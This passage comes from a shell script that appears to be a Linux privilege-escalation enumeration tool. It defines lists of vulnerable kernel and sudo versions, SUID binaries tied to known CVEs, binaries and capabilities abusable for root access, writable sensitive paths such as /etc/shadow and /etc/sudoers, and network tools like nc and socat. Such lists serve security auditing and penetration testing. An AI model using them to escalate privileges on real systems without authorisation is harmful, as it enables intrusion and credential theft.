    953 kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6"
    954 kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6"
    955 kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7"
    956 
    957 sudovB="[01].[012345678].[0-9]+|1.9.[01234][^0-9]|1.9.[01234]$|1.9.5p1|1\.9\.[6-9]|1\.9\.1[0-6]|1\.9\.17($|[^0-9p]|p[12]([^0-9]|$))"
    958 
    959 mountpermsB="\Wsuid|\Wuser|\Wexec"
    960 
    961 mountpermsG="nosuid|nouser|noexec"
    962 
    963 mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut -d " " -f5 | grep "^/" | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}')
    964 if ! [ "$mounted" ]; then
    965   mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}')
    966 fi
    967 if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi
    968 
    969 mountG="swap|/cdrom|/floppy|/dev/shm"
    970 
    971 notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee"
    972 
    973 containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override|sys_rawio|syslog|net_raw|net_admin"
    974 
    975 GREP_IGNORE_MOUNTS="/ /|/null | proc proc |/dev/console"
    976 
    977 GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
    978 
    979 GCP_BAD_SCOPES="/cloud-platform|/compute"
    980 
    981 mygroups=$(groups 2>/dev/null | tr " " "|")
    982 
    983 dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism"
    984 
    985 processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:"
    986 
    987 processesB="amazon-ssm-agent|knockd|splunk"
    988 
    989 rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService"
    990 
    991 processesVB='jdwp|tmux |screen | inspect |--inspect=|--inspect |--inspect$|--inpect-brk|--remote-debugging-port'
    992 
    993 cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|mod-pagespeed|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|"
    994 
    995 cronjobsB="centreon|pg_basebackup|run-parts|crontab-ui"
    996 
    997 timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|exim4-base.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer"
    998 
    999 PASSTRY="2000" #Default num of passwds to try (all by default)
   1000 
   1001 Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|')
   1002 
   1003 groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)|\(staff\)"
   1004 
   1005 groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)"
   1006 
   1007 MyUID=$(id -u $(whoami))
   1008 
   1009 if [ "$MyUID" ]; then 
   1010     myuid=$MyUID; 
   1011 elif [ $(id -u $(whoami) 2>/dev/null) ]; then
   1012     myuid=$(id -u $(whoami) 2>/dev/null);
   1013 elif [ "$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1)" ]; then 
   1014     myuid=$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1); 
   1015 fi
   1016 if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi
   1017 
   1018 idB="euid|egid$baduid"
   1019 
   1020 knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html
   1021 
   1022 sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|env_keep|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount|/restic|/usermod|/sbin/ldconfig|/usr/sbin/ldconfig|ldconfig -f|--password-command|--password-file|-o ProxyCommand|-o PreferredAuthentications"
   1023 
   1024 sudoG="NOEXEC"
   1025 
   1026 USEFUL_SOFTWARE="authbind aws az base64 ctr curl doas docker fetch g++ gcc gcloud gdb go kubectl lua lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm"
   1027 
   1028 NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so"
   1029 
   1030 cfuncs='file|free|main|more|read|split|write'
   1031 
   1032 LDD="$(command -v ldd 2>/dev/null || echo -n '')"
   1033 
   1034 READELF="$(command -v readelf 2>/dev/null || echo -n '')"
   1035 
   1036 #Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
   1037 sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
   1038  /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\
   1039  /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22\
   1040  /chfn$%SuSE_9.3/10\
   1041  /check_icmp$%Monitoring_Plugins<3.0.1_if_setuid-root\(07-2026\)\
   1042  /chkey$%Solaris_2.5.1\
   1043  /chkperm$%Solaris_7.0_\
   1044  /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\
   1045  /chpasswd$%SquirrelMail\(2004-04\)\
   1046  /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\
   1047  /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\
   1048  /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\
   1049  /enlightenment_backlight$%Before_0.25.4_\(CVE-2022-37706\)\
   1050  /enlightenment_ckpasswd$%Before_0.25.4_\(CVE-2022-37706\)\
   1051  /enlightenment_sys$%Before_0.25.4_\(CVE-2022-37706\)\
   1052  /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\
   1053  /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\
   1054  /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\
   1055  /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\
   1056  /keybase-redirector%CentOS_Linux_release_7.4.1708\
   1057  /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\
   1058  /lpc$%S.u.S.E_Linux_5.2\
   1059  /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\
   1060  /mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6\
   1061  /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\
   1062  /movemail$%Emacs\(08-1986\)\
   1063  /mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
   1064  /mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
   1065  /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\
   1066  /newgrp$%HP-UX_10.20\
   1067  /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\
   1068  /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\
   1069  /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)/Generic_CVE-2021-4034\
   1070  /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\
   1071  /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\
   1072  /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\
   1073  /rcp$%RedHat_6.2\
   1074  /rdist$%Solaris_10/OpenSolaris\
   1075  /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\
   1076  /screen$%GNU_Screen_4.5.0\
   1077  /sdtcm_convert$%Sun_Solaris_7.0\
   1078  /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\
   1079  /snap-confine$%Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation\(CVE-2019-7304\)\
   1080  /sudo%check_if_the_sudo_version_is_vulnerable\
   1081  /Serv-U%FTP_Server<15.1.7(CVE-2019-12181)\
   1082  /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\
   1083  /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\
   1084  /traceroute$%LBL_Traceroute_\[2000-11-15\]\
   1085  /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\
   1086  /umount$%BSD/Linux\(08-1996\)\
   1087  /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\
   1088  /uucp$%Taylor_UUCP_1.0.6\
   1089  /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\
   1090  /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\
   1091  /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\
   1092  /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
   1093  /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
   1094 
   1095 sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent$|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$"
   1096 sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$"
   1097 sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/hping3$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$"
   1098 sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$"
   1099 
   1100 sidVB='/R$|/aa-exec$|/ab$|/acr$|/agetty$|/alpine$|/apache2$|/apt-get$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/asterisk$|/atobm$|/aws$|/base32$|/base64$|/basenc$|/basez$|/bash$|/batcat$|/bc$|/bconsole$|/bee$|/bridge$|/busctl$|/bzip2$|/cabal$|/cancel$|/capsh$|/cat$|/chattr$|/chmod$|/choom$|/chown$|/chroot$|/chrt$|/clamscan$|/clisp$|/cmp$|/cobc$|/column$|/comm$|/cp$|/cpio$|/cpulimit$|/crash$|/csh$|/csplit$|/csvtool$|/ctr$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dc$|/dd$|/debugfs$|/dialog$|/diff$|/dig$|/distcc$|/dmesg$|/dmsetup$|/dnsmasq$|/docker$|/dos2unix$|/dosbox$|/dpkg$|/dvips$|/easyrsa$|/ed$|/efax$|/egrep$|/elvish$|/enscript$|/env$|/eqn$|/espeak$|/ex$|/expand$|/expect$|/fastfetch$|/ffmpeg$|/fgrep$|/file$|/find$|/finger$|/fish$|/flock$|/fmt$|/fold$|/forge$|/fping$|/ftp$|/fzf$|/gawk$|/gcloud$|/gcore$|/gdb$|/genie$|/genisoimage$|/getent$|/ginsh$|/git$|/gnuplot$|/grep$|/gtester$|/guile$|/gzip$|/head$|/hexdump$|/hg$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/joe$|/join$|/jq$|/jrunscript$|/julia$|/ksshell$|/kubectl$|/last$|/latex$|/ld.so$|/ldconfig$|/less$|/lftp$|/links$|/logrotate$|/logsave$|/look$|/lp$|/ltrace$|/lua$|/lualatex$|/luatex$|/lxd$|/m4$|/mail$|/make$|/man$|/mawk$'
   1101 sidVB2='/minicom$|/more$|/mosquitto$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$|/multitime$|/mv$|/mysql$|/nano$|/nasm$|/nc$|/ncdu$|/ncftp$|/nginx$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/nsenter$|/ntpdate$|/octave$|/od$|/opencode$|/openssl$|/openvpn$|/pandoc$|/paste$|/pax$|/pdflatex$|/pdftex$|/perf$|/perl$|/pexec$|/pg$|/php$|/pic$|/pidstat$|/plymouth$|/pr$|/psftp$|/psql$|/ptx$|/python$|/qpdf$|/rc$|/readelf$|/redis$|/restic$|/rev$|/rlogin$|/rlwrap$|/rpm$|/rpmdb$|/rpmquery$|/rpmverify$|/rsync$|/rtorrent$|/run-parts$|/runscript$|/sash$|/scanmem$|/scp$|/script$|/scrot$|/sed$|/setarch$|/setcap$|/setfacl$|/setlock$|/sftp$|/shred$|/shuf$|/slsh$|/socat$|/socket$|/soelim$|/softlimit$|/sort$|/split$|/sqlite3$|/ss$|/ssh$|/ssh-agent$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/task$|/tasksh$|/tbl$|/tclsh$|/tcpdump$|/tcsh$|/tdbtool$|/tee$|/telnet$|/terraform$|/tex$|/tftp$|/tic$|/time$|/timeout$|/tmate$|/tmux$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/unsquashfs$|/unzip$|/update-alternatives$|/urlget$|/uuencode$|/varnishncsa$|/vi$|/vigr$|/vim$|/vipw$|/volatility$|/w3m$|/watch$|/wc$|/wget$|/whiptail$|/whois$|/wish$|/xargs$|/xdotool$|/xmodmap$|/xmore$|/xpad$|/xxd$|/xz$|/yash$|/zic$|/zip$|/zless$|/zsh$|/zsoelim$'
   1102 
   1103 STRACE="$(command -v strace 2>/dev/null || echo -n '')"
   1104 
   1105 STRINGS="$(command -v strings 2>/dev/null || echo -n '')"
   1106 
   1107 writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$"
   1108 
   1109 OLDPATH=$PATH
   1110 ADDPATH=":/usr/local/sbin\
   1111  :/usr/local/bin\
   1112  :/usr/sbin\
   1113  :/usr/bin\
   1114  :/sbin\
   1115  :/bin"
   1116 spath=":$PATH"
   1117 for P in $ADDPATH; do
   1118   if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi
   1119 done
   1120 
   1121 writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/ld.so.preload|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|/bin/bash|/usr/bin/bash|/bin/sh|/usr/bin/sh|/bin/dash|/usr/bin/dash|/bin/zsh|/usr/bin/zsh|/usr/bin/env|"$(echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g') #Add Path but remove simple dot in PATH
   1122 
   1123 capsVB="cap_sys_admin:mount|python \
   1124 cap_sys_ptrace:python \
   1125 cap_sys_module:kmod|python \
   1126 cap_dac_override:python|vim \
   1127 cap_chown:chown|python \
   1128 cap_fowner:chown|python \
   1129 cap_setfcap:python|perl|ruby|php|node|lua|bash \
   1130 cap_setpcap:python|perl|ruby|php|node|lua|bash \
   1131 cap_setuid:gdb|gzip|node|perl|php|python|ruby|tclsh \
   1132 cap_setgid:gdb|gzip|node|perl|php|python|ruby|tclsh \
